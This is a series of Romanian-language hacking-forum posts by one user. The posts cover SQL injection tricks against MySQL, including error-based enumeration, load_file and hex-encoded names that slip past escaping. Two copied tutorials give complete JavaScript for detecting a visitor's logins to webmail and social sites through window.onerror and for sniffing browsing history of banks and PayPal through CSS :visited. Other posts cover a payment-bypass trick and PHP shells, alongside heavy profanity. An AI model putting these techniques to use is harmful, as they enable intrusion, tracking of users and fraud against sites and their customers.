michee

as dori sa adaug si eu o urare in spiritul Sfintelor Sarbatori de Craciun care se apropie......PULA-N CUR LU MOS CRACIUN!

Am si eu o intrebare. Cum aflu structura bazei de date pe un server mysqld 4.1.20-log ? Ptr ca nu e information_schema:(..... ps: nevermind mi-am amintit.....e tricku-ul ala cu having 1=1 .....

da, de acord cu moubik. Pentru orice altceva exista softpedia.

tu nu stii cum sa faci sa oftici lumea,ah?........sadistic m***** f*****

Ar mai fi cate ceva de baza: 1) Functia load_file desi tre sa ai FILE_PRIV 2) unde ai table_name='nume_tabela' e mai bine sa pui numele tabelei in hexa ptr ca de obicei se foloseste mysql_real_escape string si nu-ti mai merge......in hexa insa e ok:)

.....np, ma bucur ca s-a inteles.

Cum am zis ieri, azi vine partea a2a.....Creditz tot ptr autorii XSS Attacks 2007.... Principiul de functionare e urmatorul: Se face o cerere catre o pagina din contul unui website de genul <script src="mail.yahoo.com"></script> Daca userul este logat in cont vom obtine o eroare js (ptr ca acea pagina e o pagina html de fapt nu e o pagina de cod js) la o anumita linie si cu o anumita descriere (sa zicem syntax error). Daca Userul nu e logat vom obtine eroare la alta linie (mai mult ca sigur zic eu --) si cu o alta descriere(sau chiar aceeeasi descriere). Deci luandu-ne dupa nr de linie la care s-a obtinut eroarea si descrierea erorii putem sa ne dam seama daca userul e logat sau nu. Dar cum vedem noi nr de linie si descrierea? Facand hijack la functia window.onerror care are ca parametri descrierea erorri, url-ul unde s-a obtinut eroarea si nr de linie. Exemplul ptr Yahoo merge sigur, am modificat eu variabilele din exemplul de mai jos. Probabil celelalte site-uri au mai suferit modificari in pagina in caz de login/ logout si va trebui sa modificati putin variabilele. <html> <head> <title>JavaScript WebSite Login Checker</title> <script> <!-- /* inlocuim functia onerror cu functia noastra */ window.onerror = err; /* Acestea sunt niste numere de linii si descriere de erori la cateva site-uri in caz de login/logout . Yahoo merge sigur probabil celelalte vor trebui modificate unelel din ele, Yahoo a fost testat de mine pe data de 19/11/2007 si a mers*/ var sites = { 'http://mail.yahoo.com/' : { 'name' : 'Yahoo Mail (Beta)', 'login_msg' : 'syntax error', 'login_line' : '16', 'logout_msg' : 'syntax error', 'logout_line' : '7', }, 'http://mail.google.com/mail/' : { 'name' : 'Gmail', 'login_msg' : 'XML tag name mismatch', 'login_line' : '8', 'logout_msg' : 'invalid XML attribute value', 'logout_line' : '3', }, 'http://profileedit.myspace.com/index.cfm?fuseaction=profile.interests' : { 'name' : 'MySpace', 'login_msg' : 'missing } in XML expression', 'login_line' : '21', 'logout_msg' : 'syntax error', 'logout_line' : '82', }, 'http://beta.blogger.com/adsense-preview.g?blogID=13756280' : { 'name' : 'Blogger (Beta)', 'login_msg' : 'XML tag name mismatch', 'login_line' : '8', 'logout_msg' : 'syntax error', 'logout_line' : '1', }, 'http://www.flickr.com/account' : { 'name' : 'Flickr', 'login_msg' : 'syntax error', 'login_line' : '1', 'logout_msg' : 'syntax error', 'logout_line' : '7', }, 'http://www.hotmail.com/' : { 'name' : 'Hotmail', 'login_msg' : 'missing } in XML expression', 'login_line' : '1', 'logout_msg' : 'syntax error', 'logout_line' : '3', }, 'http://my.msn.com/' : { 'name' : 'My MSN', 'login_msg' : 'missing } in XML expression', 'login_line' : '1', 'logout_msg' : 'syntax error', 'logout_line' : '3', }, 'http://searchappsecurity.techtarget.com/login/' : { 'name' : 'SearchAppSecurity Techtarget', 'login_msg' : 'syntax error', 'login_line' : '16', 'logout_msg' : 'syntax error', 'logout_line' : '3', }, 'https://www.google.com/accounts/ManageAccount' : { 'name' : 'Google', 'login_msg' : 'XML tag name mismatch', 'login_line' : '91', 'logout_msg' : 'missing = in XML attribute', 'logout_line' : '35', } }; /* Creem un tabel dinamic ptr fiecare site in parte*/ function addRow(loc) { var table = document.getElementById('results'); var tr = document.createElement('tr'); table.appendChild(tr); var td1 = document.createElement('td'); td1.innerHTML = sites[loc].name; tr.appendChild(td1); var td2 = document.createElement('td'); td2.width = 200; td2.setAttribute('id', sites[loc].name); td2.innerHTML = ''; tr.appendChild(td2); var td3 = document.createElement('td'); tr.appendChild(td3); var button = document.createElement('input'); button.type = "button"; button.value = "Check"; button.setAttribute("OnClick", 'check("' + loc + '");'); td3.appendChild(button); } /* Creea un request Catre link-urile de mai sus care vor genera erorile de analizat */ function check(loc) { var script = document.createElement('script'); script.setAttribute('src', loc); document.body.appendChild(script); } /* handlerul de erori care va decide daca userul e logat sau nu.*/ function err(msg, loc, line) { /* results block */ var res = document.getElementById(sites[loc].name); /* check to see if the current test URL matches the signature error message and line number */ if ((msg == sites[loc].login_msg) && (line == sites[loc].login_line)) { res.innerHTML = "Logged-in"; } else if ((msg == sites[loc].logout_msg) && (line == sites[loc].logout_line)) { res.innerHTML = "Not Logged-in"; } else { res.innerHTML = "Not Logged-in"; } window.stop(); } // end err subroutine // --> </script> </head> <body> <div align="center"> <h1>JavaScript WebSite Login Checker</h1> <table id="results" border="1" cellpadding="3" cellspacing="0"></table> <script> for (var i in sites) { addRow(i); } </script> </div> </body> </html> Astept intrebari, poate n-am fost nestul de clar in explicatii, sunt cam rupt de oboseala cand am scris asta.

cine, ce tutorial a facut?

Np. @moubik eh, ai vazut acuma.

daca va purtati frumos, promit ca va mai dau ceva si maine:P

Probabil ca unii stiu deja, membrii VIP si cei care au cedit cartea XSS atacks 2007.....de acolo am luat acest tutorial si m-am gandit sa-l postez si sa explic. Merge mana in mana cu XSS-ul deci <html> <body> <H3>Visited</H3> <ul id="visited">[/list] <H3>Not Visited</H3> <ul id="notvisited">[/list] <script> /* Aici creez o lista de site-uri pe care vreau sa stiu daca au fost vizitate sau nu de catre user-ul respectiv */ var websites = [ "http://ha.ckers.org", "http://jeremiahgrossman.blogspot.com/", "http://mail.google.com/", "http://mail.yahoo.com/", "http://www.e-gold.com/", "http://www.amazon.com/", "http://www.bankofamerica.com/", "http://www.whitehatsec.com/", "http://www.bofa.com/", "http://www.citibank.com/", "http://www.paypal.com/", ]; /* Parcurg array-ul websites */ for (var i = 0; i < websites.length; i++) { /* Creez un link cu un id unic ptr fiecare website in parte*/ var link = document.createElement("a"); link.id = "id" + i; link.href = websites[i]; link.innerHTML = websites[i]; /* Deci cum am zis mai sus fiecare link are un id unic. Ptr fiecare id creez un stil in cazul in care link-ul respectiv a fost vizitat. Acest fapt necesita cunostinte minime de css dupa cum stiti un link poate avea starile link, visited,hover si active . */ document.write('<style>'); document.write('#id' + i + ":visited {color: #FF0000;}"); document.write('</style>'); /* Adaug link-ul in DOM si apoi ii dau remove. Aici este smecheria. Browserul afiseaza un link in culori diferite dupa cum a fost vizitat sau nu. */ document.body.appendChild(link); var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color"); document.body.removeChild(link); /* Folosind functia document.defaultView.getComputedStyle(link,null).getPropertyValue("color"); Pot analiza cum imi afiseaza mie browser-ul link-ul respectiv. */ if (color == "rgb(255, 0, 0)") { // visited /* Daca functia imi intoarce aceeasi culoare cu cea pe care am setat-o eu mai sus ptr stilul vizitat inseamna ca site-ul a fost vizitat */ var item = document.createElement('li'); item.appendChild(link); document.getElementById('visited').appendChild(item); } else { // not visited /* altfel nu a fost vizitat */ var item = document.createElement('li'); item.appendChild(link); document.getElementById('notvisited').appendChild(item); } } </script> </body> </html> Cum am zis creditele se duc la autorii cartii respective. Daca nu am fost destul de clar in explicatii astepta intrebari. Si mai usor cu flame-urile ca e primu meu tutorial, sper sa ajute pe careva.

pai baga vere,ce mai astepti?

1)Se scrie "mai" legat, sper ca nu te superi, da' era unu pe aici care corecta "aberatii gramaticale" cu sh, tz si d-astea... 2) POZEEEEE!!!! Vrem Poze!!!!!! cat mai indecente si picante!

stai fratioare ca topicu "bagaboante" mi s-a parut dintotdeauna foarte interesant......nos ai poze, filme ceva?

teoretic ar merge ptr orice sistem de plata nu numai paypal, daca nu se face verificarea in pagina respectiva.....Copii Linkul de "plata efectuata" ca sa zic asa in browser si gata......nu e o chestie care tine de paypall ci mai degraba de site-ul care implementeaza o metoda de plata.

ah , pai stai fratioare eu credeam ca tu chiar te-ai insurat:))))) de-asta m-am si abtinut sa spun ca are o fatza de chatista, iar intuitia imi spune ca ar avea talente deosebite.....

dap, am auzit ca si adobe vor sa-si mute toate aplicatiile pe net in urmatorii 10 ani....

....vere......deci ce-am gasit eu acolo erau chestii care puteau fi evitate foarte simplu cu 2 functii de filtrare una ptr XSS si una ptr SQL..... Eu in site-urile mele am o singura functie de fapt care le face pe amandoua....si o apelez peste tot unde am un GET sau un POST.... Si cu functia asta in mod sigur 90% din atacuri zic eu....

da si n-am inteles exact ce vrei sa zici cu asta moubik....

asta asa e ......cand e vorba de bagabonteli. Da eu ma refeream la job-urile serioase firme mari, multinationale etc. Nu poate nimeni sa ofere un raspuns concret?

deci ar trebui sa stau calm,ah?....

a folosit cineva shell-urile alea 2 in php? Eu am downlodat unul din ele pe windows si nav-ul mi l-a sters automat ca fiind virus...

combinatiile sunt bune......i like them:)....Cunosc baietii care au facut bani frumosi din asa ceva.....Am facut si eu si mi-a mai iesit cate ceva etc. ....Sper sa mai fac:) Dar la concret.....Programatori sunt? Cat castiga?

Vere...explica-mi si mie relevanta culturii generale ptr un asemenea post.....baietii aia de-acolo nu stiau sa faca un site ANTI-INJECTION si ANTI-XSS.........apropo ei erau vreo 6 eu eram unu singur si culmea ironiei lucrau de vreo 6 ani la portalul ala. Deci ce ti se mai important? Cine e mai avantajat? Stiau ei ca Ceylon e insula? Foarte bine, ma doare la pula.....i-am facut de tot rahatu practic. Sa-nvete tot atlasu geografic si ce mai vor ei tot niste terminati sunt..... Cand am zis ce informatie sa dau ====> Nu era nici o informatie de dat de aia nu am dat. si inca o data .......MA FUT IN EA DE CULTURA GENERALA daca nu esti in stare sa faci(BINE) lucrul ptr ca esti platit sa-l faci.

ce joburi aveti? Unde, pe cati bani, de cata vreme? Intreb asta ptr ca am fost la cateva interviuri in ultima vreme si voiam si eu sa stiu mai multe.... o sa va si povestesc din experientele mele unele sunt chiar tari.....